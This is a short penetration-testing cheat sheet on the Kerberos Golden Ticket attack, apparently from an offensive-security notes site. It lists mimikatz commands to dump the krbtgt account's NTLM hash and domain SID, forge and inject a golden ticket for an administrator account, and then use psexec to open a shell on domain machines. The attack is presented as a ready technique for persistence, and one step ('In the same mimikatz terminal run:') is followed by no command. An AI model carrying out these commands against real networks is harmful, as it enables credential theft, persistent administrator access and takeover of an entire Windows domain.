Golden Ticket Attack



This attack lets us connect to all the computers on the domain. Using the krbtgt user with a kerberos ticket granting ticket, we can request access to any resource or system on the domain using the ticket granting service. This is a cool attack and is a Persistence.


lsadump::lsa /inject /name:krbtgt 
  • Copy the SID of the domain.

  • Copy the NTLM Hash of the krbtgt user account.

Generate Golden Ticket

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:500 /ptt
  • ptt is for Pass the Ticket.

Use psexec.exe

In the same mimikatz terminal run:


This is a terminal that has the golden ticket. Now upload psexec.exe and run it like this to get a shell on every computer domain:

psexec.exe \\Machine cmd.exe

Last updated